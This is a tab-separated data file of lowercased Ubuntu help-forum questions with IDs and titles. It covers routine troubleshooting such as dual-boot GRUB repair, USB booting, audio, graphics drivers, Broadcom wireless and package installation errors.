388426	where is the os name stored , and how can i edit it ?	as question says , i am looking for file that holds system name ( note : not hostname ) and by that i mean , where it comes from `` ubuntu '' `` ubuntu 13.10 '' and so on ... is there any way to change it ? for example , to change ubuntu to somedummylinuxos ...
388427	booting ubuntu from usb - do n't see where i can choose usb over my hard drive	i am running windows 7 on my laptop but want to get ubuntu os . i put the iso file on a usb stick and made it 'bootable ' or whatever . when i restart my computer and hit f12 to go to the boot menu , there is no option to download ubuntu from my usb stick . i tried going into the bios menu and then tried running the cd/dvd option and neither of those worked . am i missing something ? the usb stick should be bootable and ready to go with the ubuntu 12 iso
388429	system variable for directory shortcut ?	is there a way to create a variable custom_dir , linked to the directory /home/user/folder1 , it is that not only in the shell , but for every program , process etc . the custom_dir refers to that directory ? it would be great if it 's set only at an user login , and anyway in a file in the /home/user directory . i suppose that .bashrc file afflicts only shell , am i wrong ?
388431	subwoofer problems	my computer is a dell vostro 200 . i recently got a new box for my ubuntu studio machine and much to my surprise , it has a 7.1 surround sound setup . i got it from a friend , and it is so much faster than my old one . i have surround sound set up and when i am listening to pandora ( which is most of the time ) it works fine . when i go to change audio sources , i run into a problem . the sub-woofer output shuts off , and i have to go into the sound settings , change it to 4.1 + analog input , and change it back to 5.1 surround sound . this happens whatever setting i have it on . as soon as i change audio sources , the sub-woofer output shuts off . is there anything i can do to fix this , or am i just going to have to keep changing the audio setup whenever ?
388432	problem with grub rescue	i have a sony vaio ultrabook that came with windows 8 preinstalled ( which means i do n't have the dvd ) , though i upgraded it to 8.1 about a month ago . today i disabled legacy mode and managed to boot from ubuntu 13.10 live cd and install it , using the install alongside windows 8 option . after the installation and updates , i tried to go back to windows8 . but i could n't , since ubuntu 's grub broke windows 8 's boot configuration data . booted back into ubuntu to try and find a solution . found something about a program called boot-repair and ran it , using the recommended settings . when i restarted my laptop , the vaio logo came on , and after that , just a black screen that said this . error : file `` /boot/grub/i386-pc/normal.mod '' not found grub rescue > so basically i ca n't do anything , i tried booting the live cd again but i couldn't.. laptop will ignore it and try to boot from hard drive and it all goes back to that screen . i want to fix it . if i have to unistall ubuntu and try to reinstall it later that 's cool , but i do n't want to have to format the whole hard drive and lose windows 8 , because i have a lot of important work related files in there , that are n't backed up . by the way , this is the boot-repair pastebin how can i solve this ?
388434	celeryd not running at startup	i ran sudo update-rc.d celeryd defaults all good . i ran : /etc/init.d/celeryd start all good . i restart machine . all bad . sudo /etc/init.d/celeryd status celeryd not running ( no pidfile ) i 'm a noob on linux and i do n't even have the first idea of where to look to find some error messages . i checked /var/log but i do n't see anything relevant . /var/log/celery is empty . but if i manually run celeryd start , then /var/log/celery will have some logs .
388439	numpy installation ?	i used virtualbox to install ubuntu 12.04 on my windows pc . i used apt-get to install python 2.7 that shipped with 12.04 . i followed the directives i saw on this site to install numpy , scipy , matplot all failed . i download tar source file of these modules . how do i install them manually ? someone pls help , i 'm getting frustrated .
388440	why is there no name showing at the command line ?	a hopefully simple one here , i do n't know why there 's no username at the $ when a new account is added and you login ? welcome to ubuntu 12.04.3 lts ( gnu/linux 3.2.0-23-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright . ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . you have mail . $
388444	how can i extract the data from a corrupted .docx file ?	my girlfriend 's .docx file corrupted and i 'm trying to recover the text from it . i learned that .docx is essentially a zip file that contains folders and bunch of .xml files ( and one of them contains document text ) . i following command on ubuntu 10.10 to unzip the archive : unzip portfolio.docx -d file-dir the result i got is : end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archieve . unzip : can not find zipfile directory in one of portfolio.docx or portfolio.docx.zip , and can not find portfolio.docx.zip , period . on windows 8.1 i tried winzip , 7zip , winrar and zip2fix but without any luck . the file weights nearly 20kb so i know there is some content inside . is there any way to force unzip ?
388449	`` no space left on device '' while installing packages	my software center stops updating my software and i get this : the following packages have unmet dependencies : linux-headers-generic : depends : linux-headers-3.2.0-57-generic but it is not installed linux-headers-generic-pae : depends : linux-headers-3.2.0-57-generic-pae but it is not installed so i tried apt-get and -f install to no avail with this message : ( reading database ... 652236 files and directories currently installed . ) unpacking linux-headers-3.2.0-57-generic ( from ... /linux-headers-3.2.0-57-generic_3.2.0-57.87_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-57-generic_3.2.0-57.87_i386.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.2.0-57-generic/include/config/comedi/dt2811.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.2.0-57-generic/include/config/comedi/dt2811.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking linux-headers-3.2.0-57-generic-pae ( from ... /linux-headers-3.2.0-57-generic-pae_3.2.0-57.87_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-57-generic-pae_3.2.0-57.87_i386.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.2.0-57-generic-pae/include/config/net/sch/atm.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.2.0-57-generic-pae/include/config/net/sch/atm.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-57-generic_3.2.0-57.87_i386.deb /var/cache/apt/archives/linux-headers-3.2.0-57-generic-pae_3.2.0-57.87_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i tried going onto software center to see if it could fix it for me and it returned similar messages . any help for a newcomer ?
388452	ubuntu 13.10 installer not recognizing my windows 8.1 partitions	i recently put together a computer with windows 8.1 ( installed on ssd ) , and i wish to dual boot with ubuntu 13.10 . however the installer does not recognize windows 8.1 nor does it recognize the partitions on my ssd . all it sees is free space ( and yes i formatted a separate partition in windows to install ubuntu on ) .
388459	ubuntu wont run on windows 8.1	i have installed ubuntu 12.04 lts on windows 8.1 with no flash drive or cd and resarted my computer . when i tried to pick ubuntu as my os i shortly got a error screen saying that ubuntu is missing files and wo n't run . any help ?
388460	how do i get a lexmark s605 printer working ?	i have a lexmark s605 printer . print jobs do n't show up in printer queue , printer is enabled but nothing prints
388465	how do i make my partitions show up in mycomputer in ubuntu ?	my partition setup is like this location - partition label /dev/sda5 - root /dev/sda6 - home /dev/sda7 - work_partition /dev/sda8 - play_partition i am not able to find the location of mycomputer in ubuntu . right now i can only see the root folder in mycomputer . i have mounted the work_partition and play_partition on /mnt/ and it shows up there everytime , even if i reboot the machine . but , i want it to show up on mycomputer next to the root folder . so how do i make my partitions show up ?
388467	special characters in /etc/issue	for some reason the color escape characters in my /etc/issue file are not working . they 're being displayed as text : here is the content of the file : ^ [ [ 1 ; 31mubuntu^ [ [ 0m and it outputs the exact same thing at the login prompt : ^ [ [ 1 ; 31mubuntu^ [ [ 0m the escapes are not properly recognized , so how can i solve that ?
388469	display occasionally cuts out and shows black screen and dmesg output	like i said in the title , my display occasionally cuts out and shows only a console-like display of the dmesg output , black background , white monospace font . i am often able to fix this by disconnecting and reconnecting a monitor . i have a laptop that i dock to a docking station so this is a regular occurrence when i remove and replace my laptop on the docking station . also , i almost always see a message such as `` unable to determine destination address '' as the most recent dmesg message . not sure if this is related . any ideas ? i am stumped . ubuntu 12.04
388472	trying to run korean crossover 27 '' 2560x1440 with dispaly port but image looks crap	so , i 've bought one of these 27 '' beasts ( crossover qhd ) and currently i am trying to get the monitor running with a thinkpad x220 seated in a docking station ( according to its specs , it can drive two display ports up to 2560x1600 ) . i read the instructions by linus torvalds ( yes , personally written by him ! ) but to no avail . here are the commands i 've tried : for finding out the exact modeline : gtf 2560 1440 60 xrandr -- newmode `` 2560x1440_666.00 '' 311.83 2560 2744 3024 3488 1440 1441 1444 1490 -hsync +vsync xrandr -- addmode hdmi1 `` 2560x1440_666.00 '' xrandr -- output hdmi1 -- mode `` 2560x1440_666.00 '' the images looks totally pixelated as you can see here : http : //pbrd.co/18xd0ln what 's wrong here ? do i have to tweak my video cards driver ?
388477	fn key combination *suddenly* stopped working for brightness only	i 've looked at most of the questions relating to enabling hardware brightness control under ubuntu with the acer aspire s3 laptop ; initially these fixes worked , under the initially installed kernel 3.2.0-57-generic . i installed 3.8.0-34-generic to enable bluetooth , and everything seemed to work fine after a couple of restarts , but today i booted it up and the brightness adjustment was not working . specifically , the brightness meter does not even appear . all the other fn combinations work ( excepting the sleep shortcut ) , including the combination to disable the backlight . i applied the fix to /etc/default/grub , namely grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' which had originally given me control of brightness , but now has no effect . i also experimented with adding and removing pcie_aspm=force , i915.i915_enable_rc6=1 , i915.semaphores=1 to that line , but there was no change in behavior . i also tried adding a keyboard shortcut for xf86monbrightnessup/down but the key combination fn+rightarrow/leftarrow seems to be getting caught by the system before it reaches the keyboard shortcut config program . how do i debug this and get brightness working ? ( i do n't want to reinstall and repeat . ) edit : i also tried this solution to no avail .
388482	buzzing noise xubuntu 13.10	i 'm using xubuntu 13.10 on a samsung series 9 np900x3c . recently , i get a buzzing noise on the speakers a while after turning it on . at first i suspected hardware faults - but then i turned down the `` system sounds '' in the pulse audio volume control , and that made it go away ! i can listen to sound from any other source . i can also record the buzzing by selecting the monitor as default fallback under the input devices . what 's the matter ? edit : i used arecord to dump the noise to a file . i do n't really know what to do with that , but looking at it of course the largest part is n't encoded characters . the parts that are , though , are either a ) chunks of lower-case letters or b ) ~~ } } | { { || } } ~~ ( or similar combinations of the same characters ) . what the hell is going on ? edit 2 : after google turned up some people having trouble with pulse audio and skype , i quit skype , and the noise is gone now . i had the sound turned down , though , so i do n't actually know if that fixed it . edit 3 : confirmed , the noise returned and quitting skype made it stop .
388483	stuck in unity 2d , 12.04	since applying some fixes to ubuntu 12.04 after being horribly stuck , i noticed when i login to unity 3d , i enter unity 2d ( both entries are available at login ) . unity 3d seems to be completely missing . nick @ nick : ~ $ /usr/lib/nux/unity_support_test -p shows : xlib : extension `` glx '' missing on display `` :0.0 '' . error : glx is not available on the system unity 3d worked perfectly before . my technical knowledge is limited so i find it hard to compare my question with those already asked on the site . additional info about what happened before this issue came up may be due to some chaotic removal and installation of stuff without reasons i understand . info here and maybe this sheds some light . i did re誰nstall the packages marked as remove : start-date : 2013-12-07 02:00:03 commandline : apt-get install libqt4-dev intltool install : libx11-xcb-dev : amd64 ( 1.4.99.1-0ubuntu2.2 , automatic ) , libxdamage-dev : amd64 ( 1.1.3-2build1 , automatic ) , libqt4-opengl-dev : amd64 ( 4.8.1-0ubuntu4.4 , automatic ) , libpthread-stubs0 : amd64 ( 0.3-3 , automatic ) , libxfixes-dev : amd64 ( 5.0-4ubuntu4.1 , automatic ) , libgl1-mesa-dev : amd64 ( 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise , automatic ) , xserver-xorg-core : amd64 ( 1.12.3+git20120709+server-1.12-branch.60e0d205-0ubuntu0ricotz~precise , automatic ) , libxcb-dri2-0-dev : amd64 ( 1.8.1-1ubuntu0.2 , automatic ) , libgl1-mesa-glx : amd64 ( 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise , automatic ) , libgl1-mesa-glx : i386 ( 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise , automatic ) , libglapi-mesa : amd64 ( 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise , automatic ) , libglapi-mesa : i386 ( 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise , automatic ) , libxxf86vm-dev : amd64 ( 1.1.1-2ubuntu0.1 , automatic ) , x11proto-kb-dev : amd64 ( 1.0.5-2 , automatic ) , x11proto-gl-dev : amd64 ( 1.4.16-1 , automatic ) , mesa-common-dev : amd64 ( 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise , automatic ) , xtrans-dev : amd64 ( 1.2.6-2 , automatic ) , libqt4-dev : amd64 ( 4.8.1-0ubuntu4.4 ) , x11proto-input-dev : amd64 ( 2.1.99.6-1 , automatic ) , x11proto-fixes-dev : amd64 ( 5.0-2ubuntu1 , automatic ) , xserver-xorg-input-evdev : amd64 ( 2.7.0+git20120504.f28507e8-0ubuntu0sarvatt~precise , automatic ) , libglu1-mesa-dev : amd64 ( 9.0.0-0ubuntu1~precise1 , automatic ) , libdrm-dev : amd64 ( 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise , automatic ) , x11proto-xf86vidmode-dev : amd64 ( 2.3.1-2 , automatic ) , x11proto-xext-dev : amd64 ( 7.2.0-3 , automatic ) , qt4-qmake : amd64 ( 4.8.1-0ubuntu4.4 , automatic ) , libxext-dev : amd64 ( 1.3.0-3ubuntu0.1 , automatic ) , libxcb-glx0-dev : amd64 ( 1.8.1-1ubuntu0.2 , automatic ) , x11proto-damage-dev : amd64 ( 1.2.1-2 , automatic ) , libqtwebkit-dev : amd64 ( 2.2.1-1ubuntu4 , automatic ) , libxau-dev : amd64 ( 1.0.6-4 , automatic ) , qt4-linguist-tools : amd64 ( 4.8.1-0ubuntu4.4 , automatic ) , xorg-sgml-doctools : amd64 ( 1.10-1 , automatic ) , libx11-dev : amd64 ( 1.4.99.1-0ubuntu2.2 , automatic ) , libx11-doc : amd64 ( 1.4.99.1-0ubuntu2.2 , automatic ) , libkms1 : amd64 ( 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise , automatic ) , libxcb1-dev : amd64 ( 1.8.1-1ubuntu0.2 , automatic ) , x11proto-core-dev : amd64 ( 7.0.22-1ubuntu0.1 , automatic ) , x11proto-dri2-dev : amd64 ( 2.8-1 , automatic ) , libxdmcp-dev : amd64 ( 1.1.0-4 , automatic ) , libpthread-stubs0-dev : amd64 ( 0.3-3 , automatic ) remove : xserver-common-lts-raring : amd64 ( 1.13.3-0ubuntu6~precise3 ) , ubuntu-desktop : amd64 ( 1.267.1 ) , xserver-xorg-input-all-lts-raring : amd64 ( 7.7+1ubuntu4~precise1 ) , xserver-xorg-video-vmware-lts-raring : amd64 ( 12.0.2+git.e5ac80d8-0ubuntu1~precise1 ) , xserver-xorg-video-modesetting-lts-raring : amd64 ( 0.7.0-0ubuntu2~precise1 ) , xserver-xorg-video-ati-lts-raring : amd64 ( 7.1.0-0ubuntu2~precise1 ) , xserver-xorg-video-r128-lts-raring : amd64 ( 6.9.1-0ubuntu1~precise1 ) , xserver-xorg-video-nouveau-lts-raring : amd64 ( 1.0.7-0ubuntu1~precise1 ) , xserver-xorg-input-mouse-lts-raring : amd64 ( 1.7.2-3~precise1 ) , x11-xserver-utils-lts-raring : amd64 ( 7.7~3ubuntu2~precise1 ) , xserver-xorg-input-evdev-lts-raring : amd64 ( 2.7.3-0ubuntu2b2~precise1 ) , xserver-xorg-video-all-lts-raring : amd64 ( 7.7+1ubuntu4~precise1 ) , xserver-xorg-video-cirrus-lts-raring : amd64 ( 1.5.2-0ubuntu1~precise1 ) , xserver-xorg-input-synaptics-lts-raring : amd64 ( 1.6.2-1ubuntu6~precise1 ) , libgl1-mesa-glx-lts-raring : amd64 ( 9.1.7-1ubuntu2~precise1 ) , libgl1-mesa-glx-lts-raring : i386 ( 9.1.7-1ubuntu2~precise1 ) , xserver-xorg-video-mach64-lts-raring : amd64 ( 6.9.3-0ubuntu1~precise1 ) , xserver-xorg-video-s3-lts-raring : amd64 ( 0.6.5-0ubuntu3~precise1 ) , xserver-xorg-video-vesa-lts-raring : amd64 ( 2.3.2-0ubuntu1~precise1 ) , xserver-xorg-video-tdfx-lts-raring : amd64 ( 1.4.5-0ubuntu1~precise1 ) , xserver-xorg-video-sisusb-lts-raring : amd64 ( 0.9.6-0ubuntu1~precise1 ) , xserver-xorg-video-radeon-lts-raring : amd64 ( 7.1.0-0ubuntu2~precise1 ) , xserver-xorg-video-trident-lts-raring : amd64 ( 1.3.6-0ubuntu2~precise1 ) , libxatracker1-lts-raring : amd64 ( 9.1.7-1ubuntu2~precise1 ) , xserver-xorg-input-wacom-lts-raring : amd64 ( 0.19.0-0ubuntu1~precise1 ) , xserver-xorg-video-mga-lts-raring : amd64 ( 1.6.2-0ubuntu1~precise1 ) , libgl1-mesa-dri-lts-raring : amd64 ( 9.1.7-1ubuntu2~precise1 ) , libgl1-mesa-dri-lts-raring : i386 ( 9.1.7-1ubuntu2~precise1 ) , xserver-xorg-lts-raring : amd64 ( 7.7+1ubuntu4~precise1 ) , xserver-xorg-video-fbdev-lts-raring : amd64 ( 0.4.3-0ubuntu1~precise1 ) , xserver-xorg-core-lts-raring : amd64 ( 1.13.3-0ubuntu6~precise3 ) , xserver-xorg-input-vmmouse-lts-raring : amd64 ( 12.9.0-0ubuntu3~precise1 ) , xorg : amd64 ( 7.6+12ubuntu2 ) , xserver-xorg-video-neomagic-lts-raring : amd64 ( 1.2.7-0ubuntu1~precise1 ) , xserver-xorg-video-openchrome-lts-raring : amd64 ( 0.3.1-0ubuntu1~precise1 ) , xserver-xorg-video-sis-lts-raring : amd64 ( 0.10.7-0ubuntu1~precise1 ) , xserver-xorg-video-savage-lts-raring : amd64 ( 2.3.6-0ubuntu1~precise1 ) , xserver-xorg-video-intel-lts-raring : amd64 ( 2.21.6-0ubuntu4.3~precise1 ) , libglapi-mesa-lts-raring : amd64 ( 9.1.7-1ubuntu2~precise1 ) , libglapi-mesa-lts-raring : i386 ( 9.1.7-1ubuntu2~precise1 ) , xserver-xorg-video-siliconmotion-lts-raring : amd64 ( 1.7.7-0ubuntu1~precise1 ) end-date : 2013-12-07 02:01:39 very sorry for the chaotic way this looks . edit : as mentioned , all the removed packages got re誰nstalled . it seemed logical to run sudo dpkg-reconfigure xserver-xorg like i found in the last link you provided . this gave me the output : building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : x11-apps linux-headers-3.2.0-56 x11-session-utils x11-xfs-utils linux-headers-3.2.0-56-generic xinit libfs6 libllvm3.3 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libgl1-mesa-glx libgl1-mesa-glx : i386 libglapi-mesa libglapi-mesa : i386 xserver-xorg-core xserver-xorg-input-evdev suggested packages : xfonts-100dpi xfonts-75dpi the following packages will be removed : libgl1-mesa-dri-lts-raring libgl1-mesa-dri-lts-raring : i386 libgl1-mesa-glx-lts-raring libgl1-mesa-glx-lts-raring : i386 libglapi-mesa-lts-raring libglapi-mesa-lts-raring : i386 libxatracker1-lts-raring ubuntu-desktop x11-xserver-utils-lts-raring xorg xserver-common-lts-raring xserver-xorg-core-lts-raring xserver-xorg-input-all-lts-raring xserver-xorg-input-evdev-lts-raring xserver-xorg-input-mouse-lts-raring xserver-xorg-input-synaptics-lts-raring xserver-xorg-input-vmmouse-lts-raring xserver-xorg-input-wacom-lts-raring xserver-xorg-lts-raring xserver-xorg-video-all-lts-raring xserver-xorg-video-ati-lts-raring xserver-xorg-video-cirrus-lts-raring xserver-xorg-video-fbdev-lts-raring xserver-xorg-video-intel-lts-raring xserver-xorg-video-mach64-lts-raring xserver-xorg-video-mga-lts-raring xserver-xorg-video-modesetting-lts-raring xserver-xorg-video-neomagic-lts-raring xserver-xorg-video-nouveau-lts-raring xserver-xorg-video-openchrome-lts-raring xserver-xorg-video-r128-lts-raring xserver-xorg-video-radeon-lts-raring xserver-xorg-video-s3-lts-raring xserver-xorg-video-savage-lts-raring xserver-xorg-video-siliconmotion-lts-raring xserver-xorg-video-sis-lts-raring xserver-xorg-video-sisusb-lts-raring xserver-xorg-video-tdfx-lts-raring xserver-xorg-video-trident-lts-raring xserver-xorg-video-vesa-lts-raring xserver-xorg-video-vmware-lts-raring the following new packages will be installed : libgl1-mesa-glx libgl1-mesa-glx : i386 libglapi-mesa libglapi-mesa : i386 xserver-xorg xserver-xorg-core xserver-xorg-input-evdev 0 upgraded , 7 newly installed , 41 to remove and 0 not upgraded . need to get 2,295 kb of archives . after this operation , 37.8 mb disk space will be freed . do you want to continue [ y/n ] ? this scares me a lot because it says a lot of stuff will be removed . i experienced this before and it resulted in being left with cli . should i run it ?
388487	can not boot to windows 8.1 after installing ubuntu 12.04.3	i installed ubuntu version 12.04.3 on my desktop and after that i can not boot windows . the computer has two hard disks ( one is 2tb , one is 1tb ) . before i installed ubuntu , i have windows 8.1 installed on the 2tb hard disk . the 1tb hard disk is empty ( no partition , no logical drive ) . i installed ubuntu in the following steps : ( 1 ) create a ubuntu 12.04.3 installation dvd ( 2 ) boot from this dvd ( 3 ) ubuntu installation program shows the following disk partition : /dev/sda ( 2 tb disk with windows 8.1 installed ) /dev/sdc ( 1 tb disk , empty , no partition ) /dev/sdb ( 32 g flash drive ) ( 4 ) i created two new partitions on /dev/sdc ( 1 tb disk ) : /dev/sdc1 ( ext4 format with 968 gb ) /dev/sdc2 ( swap , 32g ) ( 5 ) i chose to install boot loader on /dev/sdc ( 1 tb disk ) ( 6 ) everything was very smooth . but after i restarted the computer , there was no windows boot option . it directly boots to ubuntu 12.04.3 user loggin screen . ubuntu still can access windows 8.1 disk ( /dev/sda , 2tb ) and i can access all the files there . but i can not boot windows 8.1 . ( 7 ) if i unplugged the hard disk with ubuntu installed ( i.e . /dev/sdc with 1tb space ) , the system still can not boot windows 8.1 . it stops with the `` grub '' prompt . can anyone help with this problem ? thanks .
388489	why am i not able to use chmod 000 for a folder ?	i ca n't chmod 000 for a folder in ubuntu 13.10
388495	how can i get the option to install alongside windows ?	prior ubuntu desktop install alongside windows vista failed due to power failure . during installation and prior to failure , i got to the installation type and checked to install alongside windows . i am once again trying to install , however when i get to the installation type , the only choices i have are replace windows and something else . i am not ready to replace/remove windows at this time . how do i get a clean install with all the installation types available ?
388500	raid controller question `` hardware raid array maximum size : 2.3tb ''	i am looking to get a raid controller for my ubuntu server ( used as a media server with plex ) i am looking to ger this http : //www.sybausa.com/productinfo.php ? iid=530 however , i am new to raid , and the sentence `` hardware raid array maximum size : 2.3tb '' does this mean it can not take 2.3tb per disk , or it can not take more than 2.3tb in total . i am looking at using 4 x 2tb disks at riad 5 . many thanks !
388502	restore default sound levels	i changed my sound levels , but i prefer the stock settings that ubuntu was installed with . removing every $ home folder to delete all possible config files ( besides the downloads , documents , etc . ) has not helped . i 've read answers to similar questions as well and tried restarting . what can i do ?
388503	delete all ubuntu desktop stuff from ubuntu server	i have ubuntu server vps , i installed 3 months ago some packages to try to get a remote connection , without success . anyway , now i 'm cleaning some stuff from my server , the problem is that i found a lot of usefulness packages like firefox , thunderbird , ubuntu-wallpapers , unity 2-d , etc ... my question is , is there anyway to safe clean those packages that are related to ubuntu desktop version ? perhaps that there is some `` magic '' command . thank you very much for your help .
388504	trying to load a 64 bit ubuntu/linux mint from a bootable usb but is not loading	i was probing around while back while on my installation of windows , to see if my computer was 64 bit os capable and i found out that my computer has em64t ( extended memory 64 bit technology ) . so that should mean that my computer is 64 bit os capable right ? my problem is that whenever i create a live bootable usb of any of the 64 bit linux isos i have on my computer using ubuntu 's pre-installed startup disk creator ( or whatever it 's called ) and try to boot to that usb it simply just ignores the usb whenever i tell my computer to boot straight to the bootable usb with the 64 bit installed on it when i change my boot order in my bios settings . what exactly is happening is that when i go into my bios and set the boot order so that my usb is the first to boot and save the changes , my computer seems to almost ignore the live usb and just loads everything on my internal hdd like it normally does when i want to use my installation of either ubuntu/windows on my internal hdd . my computer does always load the gnugrub before it loads my installation of ubuntu/windows on my internal hdd . unless i am just assuming that my computer is capable of running 64 bit oses simply because my computer has em64t , should my computer be able to boot and use 64 bit oses ? if my computer is indeed capable of running a 64 bit os , why ca n't i get my computer to boot into any 64 bit ubuntu ( ubuntu , linux mint ) that i have tried and made into a bootable usb ? why is it seem like my computer 's just flat out not wanting to load into them as though the usb is not there ( even though my boot order in the bios reads the usb perfectly fine ) ?
388505	virtualbox on ubuntu /windows xp viruses or security issues ?	i wan na install windows xp in a virtualbox on ubuntu 13.10 , i will install it only for being able to use a programs of the government for inputting taxes ( the argentine government has n't make programs for linux yet ) , it does n't use internet , i 'd like to generate the file and then send it trought internet but from ubuntu ; and play pes 2011 ( it does n't use internet too ) . do i need to install an antivirus or anything else in windows ? i 'm afraid viruses can infect ubuntu , though i wo n't use internet from windows .
388506	how to make /usr/lib owned by root again	i chowned -r username /usr/lib and now i can not sudo or do any thing really due to sudoers.so belonging to username . how do i fix this and make /usr/lib owned by root again ?
388507	how to make v4l2ucp 's `` exposure , auto priority '' persistent on reboot ?	my laptop 's webcam has the common too dark issue , and what fixes it is using v4l2ucp and activating `` exposure , auto priority '' . the problem is , the setting reverts after every reboot . any way to make it persistent ?
388508	can we set the root without password ?	suppose that i had set the root password before with ssh key . hereinafter , i want to let the root without password . is there a way to do that ? thank you
388511	gma500_gfx vs cedarview-graphics-drivers ?	i am using ubuntu 12.04.3 kernel 3.8.33 on an intel n2600/gma3600 netbook . ubuntu currently runs in 1024*600 resolution which is perfect for my netbook . however the graphic performance is very poor . i am stuck with unity 2d and video playback is dreary . glxgears reports framerates ( < 1 ) and cpu usage for glxgears is 100 % ( as reported by top ) . the driver in use is gma500_gfx . i read somewhere that the proprietry drivers in repositories can give hardware accelarated video playback and opengl es support . however , the cedarview-graphics-drivers fails to install with kernel > 3.2 and xorg > 1.1 . i am planning on downgrading to ubuntu 12.04.1 , where these drivers can be installed ? will it provide better video playback than gma500_gfx ?
388513	how can you install oracle java jdk 7 without an internet connection with noob friendly instructions ?	is there any way that you can easily and i mean easily install oracle java jdk 7 in ubuntu with absolutely no internet connection . i 'm asking because i am completely new to things ( noob and newb ) like this in ubuntu . i have access to a windows os based computer that has internet but not at home which is the computer that has ubuntu installed so i can download the needed files/materials to install and later bring them to my computer at home to install . i would like it if somewhere there were instructions that give every detail ( even such as what application to open exactly what directory and how to access the directory etc ... ) to what must be done to get oracle java jdk 7 installed . thanks in advance .
388514	bad exe format when trying to use wine to install a setup.exe from an iso	i am new to linux . so i have zoo tycoon that i installed on ubuntu 12.04 . it runs fine no problems . but i want to be able to play it without a disc like i could do on windows . so i copied the disc image using the dd command . i mounted the iso to a virtual drive using acetoneiso . it tells me to insert the disc when i try to start up zoo tycoon . so i tried to install it from the iso instead of the disc to see if that works . i can see setup.exe along with the other files in the iso on a virtual drive . when i try to run setup.exe using wine , it tells me access denied . so i use command line and type wine setup.exe and it tells me wine : bad exe format for h : \virtual-drives\1\setup.exe i just want to be able to play zoo tycoon without the disc because the disc is pretty old . is there someway to do this or am i going about this all wrong ?
388516	wireless not working bcm43142 ubuntu 12.10 on sony vaio fit 15e svf15414cxb	i recently bought sony vaio fit 15e svf15414cxb . it has a amd 64-bit processor and is pre-installed with windows 8 . i installed ubuntu 12.10 and made it dual boot . but to my surprise no wireless network is detected on ubuntu . even the option `` enable wireless '' does not appear . $ lshw -c network product : bcm43142 802.11b/g/n vendor : broadcom corporation . . . configuration : latency=0 $ iwconfig eth0 no wireless extensions lo no wireless extensions $ lspci -nn 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) i followed the following methods without success : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx -- > this link does not say anything about bcm43142 chipset tried with ndiswrapper following the procedure on ubuntu documentation , but no luck . http : //tuxthink.blogspot.com/2013/11/installing-broadcom-bcm43142-wireless.html -- > no luck - but there is no file named wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb available on internet now ( might be there previously ) , therefore this method failed . so i 'm unable to use wireless on my ubuntu 12.10 , however wired connection works .
388520	untrusted application launcher	so i 'm trying to create a desktop icon for an application , and i dragged it from the top-left menu ( i think it 's called dash or something ) . i clicked on it and it says it is untrusted and refuse to execute it . i found out that i have go to permission and check the checkbox saying `` allow executing file as program '' . however , when i open up the permission dialog it says `` i am not the owner , therefore i can not change those settings . '' everything is disabled and i ca n't check it . why is this happening and how do i `` make myself the owner '' ?
388521	new 12.04 installation . illegible graphics with a radeon x1200	i have a fresh 12.04 installation , and the only way that the graphics work correctly is if i start in failsafe graphics mode . since i ca n't post an image , please click here for a cellphone shot of the problem : http : //www.gregortorrence.com/images/triangles.png and below is output from all of the informative commands listed on https : //help.ubuntu.com/community/radeondriver . what can i do to make my graphics work correctly ? thanks in advance , gregor gregor @ gregor-system-product-name : ~ $ lspci -nn | grep -i vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rs690 [ radeon x1200 ] [ 1002:791e ] gregor @ gregor-system-product-name : ~ $ dmesg | egrep 'drm|radeon' [ 5.562168 ] [ drm ] initialized drm 1.1.0 20060810 [ 5.886298 ] [ drm ] vgacon disable radeon kernel modesetting . [ 5.886978 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 5.887014 ] [ drm ] no driver support for vblank timestamp query . [ 5.887049 ] [ drm ] initialized radeon 1.33.0 20080528 for 0000:01:05.0 on minor 0 [ 77.304446 ] [ drm ] setting gart location based on new memory map [ 77.305414 ] [ drm ] loading rs690/rs740 microcode [ 77.357267 ] [ drm ] num pipes : 1 [ 77.357275 ] [ drm ] writeback test succeeded in 1 usecs gregor @ gregor-system-product-name : ~ $ libgl_debug=verbose glxinfo name of display : :0.0 libgl : screen 0 does not appear to be dri2 capable libgl : xf86drigetclientdrivername : 5.3.0 r300 ( screen 0 ) libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/r300_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/r300_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/swrast_dri.so libgl : ca n't open configuration file 